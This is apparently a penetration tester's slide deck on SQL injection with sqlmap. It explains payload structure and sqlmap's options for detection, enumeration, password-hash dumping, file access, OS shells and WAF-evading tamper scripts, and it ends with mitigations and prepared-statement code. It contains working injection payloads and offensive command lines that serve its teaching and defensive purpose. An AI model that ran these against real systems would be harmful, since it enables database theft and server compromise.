1. SQL injection with sqlmap
Herman Duarte <hcoduarte@gmail.com>
Tuesday, December 4, 12 1
2. About me
Consultant @ INTEGRITY S.A. - www.integrity.pt
Penetration testing engagements
BSc in Information Systems and Computer Engineering
CISSP Associate / ISO27001LA / CCNA
Security addict :)
4. SQLi 101: Definition
Definition:
SQL injection occurs when it is possible to inject SQL
commands in data-plane input in order to affect the
execution of predefined SQL statements
It affects any application that builds dynamic SQL queries from
unsanitized user-supplied input (e.g. web apps, fat clients)
Cause:
Bad programming practices + lack of knowledge/awareness
5. SQLi 101: Structure
...?name=robert' union all select null,@@version,null #
Prefix: ' (closes the string literal the input landed in)
Payload: union all select null,@@version,null (three columns, matching name,status,age)
Suffix: # (comments out the trailing ' AND age > 42 so the statement still parses)
$query = "SELECT name,status,age FROM user WHERE
name='" . $_REQUEST['search'] . "' AND age > 42";
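Added example (not from the talk or from sqlmap) of the prefix/payload/suffix structure above, using an in-memory SQLite table in place of the slide's MySQL `user` table. SQLite has no @@version and no `#` comment, so the payload uses sqlite_version() and `--` instead; the rows are constructed for the demo. It also shows why the suffix matters: without it the leftover `' AND age > 42` is glued onto the payload and the DBMS rejects the statement.

```python
import sqlite3

# Constructed demo rows standing in for the slide's `user` table.
ROWS = [("robert", "active", 50), ("alice", "active", 30), ("bob", "disabled", 61)]

# SQLite dialect of the slide's payload: sqlite_version() for @@version, '--' for '#'.
PREFIX = "'"
PAYLOAD = "union all select null,sqlite_version(),null"
SUFFIX = "--"


def open_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (name TEXT, status TEXT, age INTEGER)")
    con.executemany("INSERT INTO user VALUES (?, ?, ?)", ROWS)
    return con


def build_query(search):
    # Same concatenation as the slide's PHP: the raw value is dropped inside a quoted literal.
    return "SELECT name,status,age FROM user WHERE name='" + search + "' AND age > 42"


def search_vulnerable(con, search):
    return con.execute(build_query(search)).fetchall()


def injected_value(with_suffix=True):
    # robert' union all select null,sqlite_version(),null --
    value = "robert" + PREFIX + " " + PAYLOAD
    return value + " " + SUFFIX if with_suffix else value


def run():
    # Returns (rows for the benign search, rows for the injected search).
    con = open_db()
    benign = search_vulnerable(con, "robert")
    injected = search_vulnerable(con, injected_value())
    return benign, injected


def suffix_is_required():
    # Without the suffix "...null' AND age > 42" leaves an unterminated literal
    # and the DBMS raises a syntax error: the suffix is what makes the query parse.
    con = open_db()
    try:
        search_vulnerable(con, injected_value(with_suffix=False))
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    print(build_query(injected_value()))
    for row in run()[1]:
        print(row)
```

The second row of the injected result is (None, '<sqlite version>', None): the UNION payload has to match the three columns of the original SELECT, which is why sqlmap spends requests finding the right column count before union-based extraction works.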
6. sqlmap
Developed in Python
Prerequisites to run sqlmap:
Python 2.6.x or 2.7.x (at the time of this talk; current sqlmap releases also run on Python 3)
To install:
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap
To update:
python sqlmap.py --update
git pull
7. sqlmap
Mainly developed by:
Bernardo Damele A. G. (@inquisb)
Miroslav Stampar (@stamparm)
8. sqlmap: Scenarios
Find and explore SQL injection in web applications
Direct connection (database account is needed)
DBMS python binding installed (e.g. PyMySQL)
-d <dbms>://<user>:<password>@<ip>:<port>/<db_name>
9. sqlmap: Workflow
Select your target
Identify possible injection points
Identify SQLi vulnerabilities:
By using sqlmap
Manual testing :)
Exploit SQLi vulnerabilities:
Enumerate
File system access
OS pwnage
Own the internal network (w00t! w00t!)
11. sqlmap: Injection points
GET parameters
POST parameters
Cookie header values (only if --level >= 2)
User-Agent header value (only if --level >= 3)
Referer header value (only if --level >= 3)
12. sqlmap: Finding SQLi (I)
./sqlmap.py -u "https://webapp.com/news.php?id=1"
or
./sqlmap.py -r news_get_request --force-ssl
Default behavior:
Tests all GET and/or POST parameters, for all SQLi
types, with payloads for every supported DBMS (until the
DBMS is identified during the tests)
Yes, it may take a long time, and it still doesn't cover all
the tests sqlmap can do (see --level and --risk).
13. sqlmap: Finding SQLi (II)
--level=<level> (1...5, default is 1)
With --level=5 every combination of payload, prefix and suffix
will be tested on all injection points available (noisier but gives
more coverage)
--risk=<risk> (0...3, default is 1)
OR-based tests are only sent with --risk=3. Why? Imagine the
tested parameter landing in an UPDATE instead of a SELECT:
UPDATE user SET disabled=1 WHERE email='email@email.com' OR 1=1#
Every account gets disabled, not just one.
-p <param to test>[,<param to test>]
Restrict the tests to the listed parameters
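Added example (not from the talk or from sqlmap) of the --risk caveat above: a constructed "disable account" handler whose UPDATE is built by concatenation, hit with the shape of sqlmap's AND-based boolean tests (default risk) and with the OR-based one (risk 3). SQLite stands in for MySQL, so the payloads end in `--` rather than `#`.

```python
import sqlite3

# Constructed demo accounts; nobody is disabled to begin with.
ACCOUNTS = ["alice@example.com", "bob@example.com", "carol@example.com"]


def open_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (email TEXT, disabled INTEGER DEFAULT 0)")
    con.executemany("INSERT INTO user (email) VALUES (?)", [(e,) for e in ACCOUNTS])
    return con


def disable_account_vulnerable(con, email):
    # The handler builds its UPDATE by concatenation, like the slide's example:
    # whatever sqlmap sends in the parameter becomes part of the WHERE clause.
    con.execute("UPDATE user SET disabled=1 WHERE email='" + email + "'")
    return con.execute("SELECT count(*) FROM user WHERE disabled=1").fetchone()[0]


def disabled_after(value):
    # Fresh table per payload; returns how many accounts ended up disabled.
    return disable_account_vulnerable(open_db(), value)


def compare_payloads():
    # AND-based tests can only narrow the set of matched rows (1 or 0 accounts);
    # the OR-based test widens it to the whole table.
    return {
        "and_true": disabled_after("alice@example.com' AND 1=1--"),
        "and_false": disabled_after("alice@example.com' AND 1=2--"),
        "or_true": disabled_after("alice@example.com' OR 1=1--"),
    }


if __name__ == "__main__":
    for name, count in compare_payloads().items():
        print(name, "->", count, "account(s) disabled")
```

Note that even the "safe" AND 1=1 variant still disabled alice: the request itself changes state, so testing a state-changing endpoint is never side-effect free; --risk=3 is what turns one changed row into a whole table.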
14. sqlmap: SQLi techniques/types
--technique=<letters> (e.g. --technique=SU; default is all of them: BEUST)
B - Boolean-based blind: data is inferred char by char from changes in the page
E - Error-based: uses the DBMS errors displayed in the page to extract data
U - Union query-based: appends a UNION SELECT to the original query to extract data
S - Stacked queries: semicolons are used to inject additional statements after the original one
T - Time-based blind: data is inferred char by char from response delays
15. sqlmap: Supported DBMSs
--dbms=mssql | mysql | postgresql | oracle ...
Microsoft SQL Server
MySQL
PostgreSQL
Oracle
IBM DB2
SAP MaxDB
Sybase
Firebird
SQLite
Microsoft Access
16. sqlmap: Logging / Verbosity
Log all HTTP traffic to a text file: -t <output file>
Save the options used on the command line to a config file: --save <file>
Verbosity:
-v <0..6> (default 1)
-v 6 shows the same HTTP traffic -t logs, but on the console
17. sqlmap: Enumeration (I)
Objective:
Get data from the DBMS tables (limited by the privileges of the
current DBMS user)
What can you get:
DBMS exact version, O.S. information, architecture and patch level: -f
DBMS banner: -b
DBMS server hostname: --hostname
DBMS user the application is using: --current-user
Applications current DB: --current-db
If the current user is a DBA: --is-dba
18. sqlmap: Enumeration (II)
What can you get:
...
List the DBMS users: --users
List the DBMS users' password hashes: --passwords
sqlmap will offer to crack the hashes with a dictionary
attack (the default answer is yes)
List users privileges: --privileges
List all available databases: --dbs
List all tables or just for a specific database:
--tables (-D <database name>)
19. sqlmap: Enumeration (III)
What can you get:
...
List all columns or just for a specific table from that database:
--columns (-T <table name> -D <db name>)
Count table entries: --count
Dump data from a database/table/column:
--dump (-D, -T, -C can be used to select what data to dump)
--dump-all (I don’t recommend it)
Search for a database, table or column by full or partial
name:
--search (with -D, -T or -C to say what to search for)
20. sqlmap: Enumeration (IV)
What can you get:
...
Executing a custom SQL query:
--sql-query=”<sql query to execute>”
Interactive SQL shell to execute all your custom
SQL queries:
--sql-shell
21. sqlmap: File system access
Objective:
Read and write any textual or binary file from the DBMS O.S.
Prerequisites:
DBMS = mssql | mysql | postgresql
Current DBMS user must have the necessary privileges
Read:
--file-read="<file path>"
Write (both options together):
--file-write="<local file path>"
--file-dest="<remote destination path>"
22. sqlmap: OS pwnage (I)
Objective:
Get access to the DBMS O.S. and, if the DBMS server sits in the
internal network, a foothold in that network
Prerequisites:
DBMS = mssql | mysql | postgresql
Current DBMS user must have the necessary privileges
What can you do?
Get a reverse shell if the DB can:
connect to the internet
ping your server (yes an icmp shell :))
Establish a VNC connection
23. sqlmap: OS pwnage (II)
To execute an OS command:
--os-cmd="<command to execute>"
To get an OS shell: --os-shell
To get a Meterpreter shell, an ICMP shell or VNC (through Metasploit):
--os-pwn
--msf-path="<msf path>"
Stored procedure privilege escalation (buffer overflow):
--bof
24. sqlmap: Tamper scripts
Tamper scripts:
--tamper <script file path>[,<script file path>]
tamper/bluecoat.py (simplified):

import re

def tamper(payload, headers=None):
    """
    Example:
        * Input: SELECT id FROM users where id = 1
        * Output: SELECT%09id FROM users where id LIKE 1

    Requirement:
        * MySQL, Blue Coat SGOS with WAF activated as documented in
          https://kb.bluecoat.com/index?page=content&id=FAQ2147
    """
    retVal = payload

    if payload:
        # Tab instead of the space after the statement keyword; it shows up
        # as %09 once the payload is URL-encoded into the request
        retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)\s+", r"\g<1>\t", payload)
        # '=' becomes LIKE, which MySQL evaluates the same way for these simple comparisons
        retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)

    return retVal
26. sqlmap: Tips
If HTTPS is being used, don't forget to set: --force-ssl
Get as much info as you can before starting to look for SQLi
vulnerabilities. It will save you time.
Union-based gives more data with fewer requests, use it
Time-based blind SQLi is faster to confirm than union-based
(union detection has to find the right number of columns first,
which costs a lot of requests when the query uses many columns)
If --is-dba says true and stacked queries work (--technique=S),
you can start to gangnam style
27. Mitigation Techniques
Sanitize and validate input
Use prepared statements / bind variables
Configure DBMS users with the least-privilege
principle in mind
Return generic error messages; don't pass DBMS errors to the user
In case the web application source code can't be
changed, a proxy can be placed between the web
server and the database server (e.g. GreenSQL)
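Added example (not from the talk or from sqlmap) putting the first four mitigations above side by side with the concatenated query from the SQLi 101 slide, on an in-memory SQLite table with constructed rows: the same union payload executed by the concatenated query returns no rows through a bind variable; errors are logged server-side and replaced by a generic message; and `PRAGMA query_only` stands in for a least-privilege DBMS account that can only SELECT.

```python
import logging
import sqlite3

LOG = logging.getLogger("app")

# Constructed demo rows for the slide's `user` table.
ROWS = [("robert", "active", 50), ("alice", "active", 30)]

# The union payload from the SQLi 101 slide, in SQLite dialect.
INJECTED = "robert' union all select null,sqlite_version(),null --"


def open_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (name TEXT, status TEXT, age INTEGER)")
    con.executemany("INSERT INTO user VALUES (?, ?, ?)", ROWS)
    return con


def search_vulnerable(con, search):
    # Concatenation: the input becomes part of the statement text.
    query = "SELECT name,status,age FROM user WHERE name='" + search + "' AND age > 42"
    return con.execute(query).fetchall()


def search_prepared(con, search):
    # Bind variables: the statement is fixed, the value is only ever compared with `name`.
    query = "SELECT name,status,age FROM user WHERE name=? AND age > ?"
    return con.execute(query, (search, 42)).fetchall()


def with_generic_error(fn, *args):
    # DBMS detail goes to the server log; the client only learns that the request failed.
    try:
        return "ok", fn(*args)
    except sqlite3.Error as exc:
        LOG.error("database error: %s", exc)
        return "error", "Search failed, please try again later."


def make_read_only(con):
    # Stand-in for a least-privilege account: from here on any write through the
    # application's connection is refused by the database itself.
    con.execute("PRAGMA query_only = 1")


def attempt_write(con):
    # Returns the DBMS error text if the write was refused, None if it went through.
    try:
        con.execute("UPDATE user SET status='disabled'")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


def demo():
    con = open_db()
    results = {
        "vulnerable": search_vulnerable(con, INJECTED),
        "prepared": search_prepared(con, INJECTED),
        # A lone quote breaks the concatenated query; the user sees only the generic message.
        "generic_error": with_generic_error(search_vulnerable, con, "robert'"),
    }
    make_read_only(con)
    results["write_blocked"] = attempt_write(con)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The prepared form is the real fix; least privilege and generic errors limit what an injection that slips through can enumerate or change, which is exactly what sqlmap's --is-dba, --privileges and error-based technique probe for.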
28. Wrap-up
Input sanitization
Use prepared statements
Least-privilege principle is your friend (use it!)
Have I said to use prepared statements ?! :)
Do code reviews
29. References
https://sqlmap.org
Advanced SQL injection to operating system full control (whitepaper) - http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857
SQL Injection Attacks and Defense (Justin Clarke) - http://www.amazon.com/Injection-Attacks-Defense-Justin-Clarke/dp/1597494240
30. Thank You!
Q&A
Herman Duarte
@hdontwit
https://www.linkedin.com/in/hcoduarte
hcoduarte@gmail.com